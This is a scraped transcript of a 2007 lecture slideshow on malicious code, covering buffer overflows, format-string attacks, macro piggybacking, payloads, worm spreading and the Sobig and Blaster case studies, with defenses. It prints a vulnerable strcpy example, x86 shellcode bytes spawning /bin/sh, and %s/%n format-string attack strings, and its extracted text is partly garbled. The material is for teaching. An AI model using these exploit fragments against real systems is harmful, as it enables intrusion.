Malicious%20Code%20for%20Fun%20and%20Profit - PowerPoint PPT Presentation

View by Category
About This Presentation
Title:

Malicious%20Code%20for%20Fun%20and%20Profit

Description:

The return address is overwritten with a pointer to malicious code. ... Malicious code can create a root shell by executing '/bin/sh'. Nov 27, 2007. Somesh Jha ... – PowerPoint PPT presentation

Number of Views:59
Avg rating:3.0/5.0
Slides: 63
Provided by: mihaichris
Learn more at: http://pages.cs.wisc.edu
Category:

less

Write a Comment
User Comments (0)
Transcript and Presenter's Notes

Title: Malicious%20Code%20for%20Fun%20and%20Profit


1
Malicious Codefor Fun and Profit
  • Somesh Jha
  • jha_at_cs.wisc.edu
  • Nov 27, 2007

2
What is Malicious Code?
  • Viruses, worms, trojans,
  • Code that breaks your security policy.
  • Characteristics

Attack vector Payload Spreading algorithm
3
Outline
  • Attack Vectors
  • Payloads
  • Spreading Algorithms
  • Case Studies

4
Attack Vectors
  • Social engineering
  • Make them want to run it.
  • Vulnerability exploitation
  • Force your way into the system.
  • Piggybacking
  • Make it run when other programs run.

5
Social Engineering
  • Suggest to user that the executable is
  • A game.
  • A desirable picture/movie.
  • An important document.
  • A security update from Microsoft.
  • A security update from the IT department.
  • Spoofing the sender helps.

6
Outline
  • Attack Vectors
  • Social Engineering
  • Vulnerability Exploitation
  • Piggybacking
  • Payloads
  • Spreading Algorithms
  • Case Studies

7
Vulnerability Exploitation
  • Make use of flaws in software input handling.
  • Sample techniques
  • Buffer overflow attacks.
  • Format string attacks.
  • Return-to-libc attacks.
  • SQL injection attacks.

8
Basic Principles
Buffer Overflows
  • A buffer overflow occurs when data is stored past
    the boundaries of an array or a string.
  • The additional data now overwrites nearby program
    variables.
  • Result
  • Attacker controls or takes over a
  • currently running process.

9
Example
Buffer Overflows
  • Expected input \\hostname\path

void process_request( char req ) // Get
hostname char host 20 int pos
find_char( req, \\, 2 ) strcpy( host,
substr( req, 2, pos 1 ) ) ...
return
process_request( \\tux12\usr\foo.txt )
? ? OK process_request( \\aaabbbcccdddeeefffg
gghhh\bar ) ? ? BAD
10
Program Stack
Buffer Overflows
  • A stack frame per procedure call.













main()
void process_request( char req ) // Get
hostname char host 20 int pos
find_char( req, \\, 2 ) strcpy( host,
substr( req, 2, pos 1 ) ) ...
return
process_request()
strcpy()
11
Program Stack
Buffer Overflows
  • A stack frame per procedure call.













main()
void process_request( char req ) // Get
hostname char host 20 int pos
find_char( req, \\, 2 ) strcpy( host,
substr( req, 2, pos 1 ) ) ...
return
process_request()
strcpy()
12
Program Stack
Buffer Overflows
  • A stack frame per procedure call.


arg req










main()
void process_request( char req ) // Get
hostname char host 20 int pos
find_char( req, \\, 2 ) strcpy( host,
substr( req, 2, pos 1 ) ) ...
return
process_request()
strcpy()
13
Program Stack
Buffer Overflows
  • A stack frame per procedure call.


arg req
return address
frame pointer








main()
void process_request( char req ) // Get
hostname char host 20 int pos
find_char( req, \\, 2 ) strcpy( host,
substr( req, 2, pos 1 ) ) ...
return
process_request()
strcpy()
14
Program Stack
Buffer Overflows
  • A stack frame per procedure call.


arg req
return address
frame pointer








main()
void process_request( char req ) // Get
hostname char host 20 int pos
find_char( req, \\, 2 ) strcpy( host,
substr( req, 2, pos 1 ) ) ...
return
process_request()
strcpy()
15
Program Stack
Buffer Overflows
  • A stack frame per procedure call.


arg req
return address
frame pointer





local pos


main()
void process_request( char req ) // Get
hostname char host 20 int pos
find_char( req, \\, 2 ) strcpy( host,
substr( req, 2, pos 1 ) ) ...
return
process_request()
strcpy()
16
Normal Execution
Buffer Overflows
process_request( \\tux12\usr\foo.txt )

arg req
return address
frame pointer








main()
void process_request( char req ) // Get
hostname char host 20 int pos
find_char( req, \\, 2 ) strcpy( host,
substr( req, 2, pos 1 ) ) ...
return
process_request()
local host
local pos
17
Normal Execution
Buffer Overflows
process_request( \\tux12\usr\foo.txt )

arg req arg req arg req arg req
return address return address return address return address
frame pointer frame pointer frame pointer frame pointer





7 7 7 7


main()
void process_request( char req ) // Get
hostname char host 20 int pos
find_char( req, \\, 2 ) strcpy( host,
substr( req, 2, pos 1 ) ) ...
return
process_request()
local host
2
\0
t
u
x
1
local pos
18
Overflow Execution
Buffer Overflows
process_request( \\aaabbbcccdddeeefffggghhhiiijjj
\bar )

arg req arg req arg req arg req
return address return address return address return address
frame pointer frame pointer frame pointer frame pointer





32 32 32 32


main()
j
j
\0
void process_request( char req ) // Get
hostname char host 20 int pos
find_char( req, \\, 2 ) strcpy( host,
substr( req, 2, pos 1 ) ) ...
return
i
i
i
j
process_request()
g
h
h
h
f
f
g
g
e
e
e
f
local host
c
d
d
d
b
b
c
c
a
a
a
b
local pos
19
Smashing the Stack
Buffer Overflows
  • The attacker gets one chance to gain control.
  • Craft an input string such that
  • The return address is overwritten with a pointer
    to malicious code.
  • The malicious code is placed inside the input
    string.

Malicious code can create a root shell by
executing /bin/sh.
20
Shell Code
Buffer Overflows
EB 17 5E 89 76 08 31 C0
Code for exec(/bin/sh) mov edx, arg2 mov ecx,
arg1 mov ebx, /bin/sh mov eax, 0Bh int 80h
88 46 07 89 46 0C B0 0B
89 F3 8D 4E 08 31 D2 CD
80 E8 E4 FF FF FF / b
i n / s h \0 arg 2
arg 2 arg 1 pointer
Pointer value for overwriting the return address.
to code
21
Thicker Armor
Buffer Overflows
  • Defense against stack-smashing attacks
  • Bounds-checking.
  • Protection libraries.
  • Non-executable stack.
  • setuid()/chroot().
  • Avoid running programs as root!
  • Address randomization.
  • Behavioral monitoring.

22
More Info
  • Smashing the Stack for Fun and Profit
  • by Aleph One
  • StackGuard, RAD, PAX, ASLR
  • CERT

23
Format String Attacks
Format Strings
  • Another way to illegally control program values.
  • Uses flaws in the design of printf()
  • printf( s d , s, x )

24
printf() Operation
Format Strings
  • printf( s d, x,
  • s, x, y )



y
x
s
format string ptr




foo()
printf()
25
Attack 1 Read Any Value
Format Strings
secret key ptr




format string ptr




What the code says printf( str ) What the
programmer meant printf( s, str ) If str
xxxxs
26
Attack 2 Write to Address
Format Strings
return address




format string ptr




4
What the code says printf( str ) If str
xxxxn
27
Defenses
Format Strings
  • Never use printf() without a format string!
  • FormatGuard.

28
Outline
  • Attack Vectors
  • Social Engineering
  • Vulnerability Exploitation
  • Piggybacking
  • Payloads
  • Spreading Algorithms
  • Case Studies

29
Piggybacking
  • Malicious code injected into a benign program or
    data file.
  • Host file can be
  • An executable.
  • A document with some executable content
  • (Word documents with macros, etc.).

30
Piggybacking Executables
  • Modify program on disk

jmp evil_code
  • Variations
  • Jump to malicious code only on certain actions.
  • Spread malicious code throughout program.

31
Piggybacking Documents
  • Documents with macros
  • Microsoft Office supports documents with macros
    scripted in Visual Basic (VBA).
  • Macro triggered on
  • Document open
  • Document close
  • Document save
  • Send document by email

32
Outline
  • Attack Vectors
  • Social Engineering
  • Vulnerability Exploitation
  • Piggybacking
  • Payloads
  • Spreading Algorithms
  • Case Studies
  • Defenses

33
? Payload
  • Target the interesting data
  • Passwords
  • Financial data
  • User behavior
  • User attention
  • Keylogger
  • Screen scraper
  • Spyware
  • Adware

34
Keylogger Use
35
Screen Scraper Use
36
More Payload Ideas
  • Victim machines are pawns in larger attack
  • Botnets.
  • Distributed denial of service (DDoS).
  • Spam proxies.
  • Anonymous FTP sites.
  • IRC servers.

37
Outline
  • Attack Vectors
  • Social Engineering
  • Vulnerability Exploitation
  • Piggybacking
  • Payloads
  • Spreading Algorithms
  • Case Studies
  • Defenses

38
? Spreading Methods
  • Depends on the attack vector
  • Email-based
  • ? need email addresses
  • Vulnerability-based
  • ? need IP addresses of hosts running the
    vulnerable service
  • Piggybacking
  • ? need more files to infect

39
Spreading through Email
Internet
Malware
40
Vulnerable Target Discovery
  • Need to find Internet (IP) addresses.
  • Scanning
  • Target list
  • Passive Contagion worms

41
Outline
  • Attack Vectors
  • Social Engineering
  • Vulnerability Exploitation
  • Piggybacking
  • Payloads
  • Spreading Algorithms
  • Case Studies

42
Types of Malicious Code
McGraw and Morrisett Attacking malicious code A
report to the Infosec Research Council
Sept./Oct. 2000.
  • Virus
  • Self-replicating, infects programs and documents.
  • e.g. Chernobyl/CIH, Melissa, Elkern
  • Worm
  • Self-replicating, spreads across a network.
  • e.g. ILoveYou, Code Red, B(e)agle, Witty

43
Types of Malicious Code
  • Trojan
  • Malware hidden inside useful programs
  • e.g. NoUpdate, KillAV, Bookmarker
  • Backdoor
  • Tool allowing unauthorized remote access
  • e.g. BackOrifice, SdBot, Subseven

44
Types of Malicious Code
  • Spyware
  • Secretly monitors system activity
  • e.g. ISpynow, KeyLoggerPro, Look2me
  • Adware
  • Monitors user activity for advertising purposes
  • e.g. WildTangent, Gator, BargainBuddy

45
Outline
  • Attack Vectors
  • Social Engineering
  • Vulnerability Exploitation
  • Piggybacking
  • Payloads
  • Spreading Algorithms
  • Case Studies Sobig

46
The Sobig Worm
  • Mass-mailing, network-aware worm
  • Multi-stage update capabilities

Launch Deactivation
Sobig.A 9 Jan. 2003 -
Sobig.B 18 May 2003 31 May 2003
Sobig.C 31 May 2003 8 June 2003
Sobig.D 18 June 2003 2 July 2003
Sobig.E 25 June 2003 14 July 2003
Sobig.F 18 Aug 2003 10 Sept 2003
47
Sobig Attack Vector
  • E-mail
  • Network shares

From Subject
big_at_boss.com
support_at_microsoft.com
bill_at_microsoft.com
admin_at_support.com
support_at_yahoo.com
  • Compressed executable attachment with renamed
    extension.
  • Later attachment in ZIP file.

48
Sobig Payload
  • 1st stage
  • Backdoor (Lala)
  • keylogger
  • 2nd stage
  • Proxy (WinGate)

Geocities web page
Trojan web server
49
Sobig Payload
1
...
22
Hacked DSL/cable hosts
Trojan web server
50
Sobig Spreading Algorithm
  • E-mail addresses extracted from files on disk.
  • Network shares automatically discovered.

51
Sobig.F in Numbers
Courtesy of MessageLabs.com
August 19 20
21 22
23
52
Outline
  • Attack Vectors
  • Social Engineering
  • Vulnerability Exploitation
  • Piggybacking
  • Payloads
  • Spreading Algorithms
  • Case Studies Sobig, Blaster

53
The Blaster Worm
  • Multi-stage worm exploiting Windows vulnerability

2003 July 2003 July 2003 July 2003 July 2003 July 2003 July 2003 July 2003 July 2003 July 2003 July 2003 July August August August August August August August August August August August August August August August
16 16 17 17 25 25 31 31 11 11 13 13 15 15 17 17 19 19


Metasploit refined exploit
Scandinavian bank closes all 70 branches
CERT advisory
FRB Atlanta, MD DMV, BMW
LSD Research exploit released
Microsoft releases patch
Blaster appears
1.2 million hosts infected
54
Blaster Attack Vector
  • Uses a Microsoft Windows RPC DCOM vulnerability.
  • Coding flaw
  • The RPC service passes part of the request to
    function GetMachineName().
  • GetMachineName() copies machine name to a fixed
    32-byte buffer.

55
Blaster Attack Vector
56
Blaster Payload
  • Worm installs itself to start automatically.
  • All infected hosts perform DDoS against
    windowsupdate.com .
  • SYN flood attack with spoofed source IP,
  • Aug 15 ? Dec 31 and
  • after the 15th of all other months.

57
Blaster Effect on Local Host
  • RPC/DCOM disabled
  • Inability to cut/paste.
  • Inability to move icons.
  • Add/Remove Programs list empty.
  • DLL errors in most Microsoft Office programs.
  • Generally slow, or unresponsive system
    performance.

58
Blaster Spreading Algorithm
  • Build IP address list
  • 40 chance to start with local IP address.
  • 60 chance to generate random IP address.
  • Probe 20 IPs at a time.
  • Exploit type
  • 80 Windows XP.
  • 20 Windows 2000.

59
Blaster Infection Rate
60
Outline
  • Attack Vectors
  • Social Engineering
  • Vulnerability Exploitation
  • Piggybacking
  • Payloads
  • Spreading Algorithms
  • Case Studies Sobig, Blaster

61
Short History of Malicious CodeAncient Times
  • 1981 First virus in the wild
  • Apple II virus Elk Cloner
  • 1983 Term computer virus appears
  • Coined by Fred Cohen
  • 1986 First IBM PC virus
  • Brain virus
  • 1988 First anti-virus program
  • Detects, removes, and immunizes against the
    Brain virus

62
Short History of Malicious CodeAncient Times
  • 1988 First true worm
  • Morris worm
  • 1989 First slow infector
  • Dark Avenger virus
  • 1989 Full stealth infector
  • Frodo virus

63
Short History of Malicious CodeMiddle Ages
  • 1990 Boom in the anti-virus market
  • IBM, McAfee, Digital Dispatch, Iris,
  • 1991(?) First polymorphic virus
  • Chameleon virus
  • 1992 First viral construction set
  • VCL 1.00 Virus Creation Laboratory
  • 1992 First mass media scare
  • Michaelangelo virus
  • Anti-virus software sales soar

64
Polymorphic Viruses
  • Encrypted virus body
  • morphed decryption routine

65
Short History of Malicious CodeRenaissance
  • 1992 First polymorphic generator
  • MtE mutation engine
  • 1992 First virus for Windows
  • 1993 First 100 polymorphic virus
  • Bootache virus
  • 1993 First script-kiddie wannabes
  • Enabled by scriptable virus generators
  • Phalcon/Skism Mass-Produced Code generator

66
Short History of Malicious CodeModern Times 1
  • 1995 First macro virus
  • Concept MS Word macro virus
  • 1996 First macro virus construction set
  • 1996 First Excel macro virus
  • Laroux macro virus
  • 1997 First Linux virus
  • Linux Bliss virus
  • 1997 First mIRC worm

67
Short History of Malicious CodeModern Times 2
  • 1998 First MS Access macro virus
  • AccessiV virus
  • 1998 First Win32 polymorphic virus
  • Win95.HPS and Win95.Marburg viruses
  • 1998 Chernobyl (CIH) virus epidemic
  • CIH can erase Flash BIOS
  • Thousands of computers infected
  • 1998 First version of BackOrifice
  • Widely-used remote management trojan

68
Short History of Malicious CodePost-Modern
Times 1
  • 1998 First virus to infect Java class files
  • Java.StrangeBrew virus
  • 1999 First macro virus to spread through e-mail
  • Melissa macro virus
  • 2000 I Love You macro virus
  • Spread automatically through e-mail
  • 2001 Code Red worm (I II)

69
Short History of Malicious CodePost-Modern
Times 2
  • 2001 Sircam worm
  • Spreads through e-mail and network shares
  • 2001 Nimda worm
  • Spreads through backdoors left by Code Red II,
    e-mail, network shares
  • 2002 Klez worm
  • Carries and deploys a virus called Elkern
  • 2003 SQL Slammer worm
  • Fastest infection rate ever

70
z0mbie-6.b Metamorphic
  • Metamorphic viruses
  • Morph the whole virus body

Virus
Program
71
z0mbie-6.b Code Integration
  • Integration of virus and program
  • e.g. Mistfall Virus Engine

Program
  • Mistfall Virus Engine
  • Parse program to infect
  • Insert code where necessary
  • Fix code and data references
  • Rebuild new executable from old program infected
    with virus body

72
Future Threat Superworm
  • Curious Yellow the First Coordinated Worm
    Design Brandon Wiley
  • Fast replication adaptability
  • Pre-scan the network for targets.
  • Worm instances communicate to coordinate
    infection process.
  • Attack vectors can be updated.
  • Worm code mutates.

73
Conclusions
  • Vulnerabilities left unpatched can and will be
    used against you.
  • Attackers are more sophisticated.
  • Need to understand the attackers perspective.

74
Malicious Codefor Fun and Profit
  • Somesh Jha
  • jha_at_cs.wisc.edu
  • Nov 27, 2007
About PowerShow.com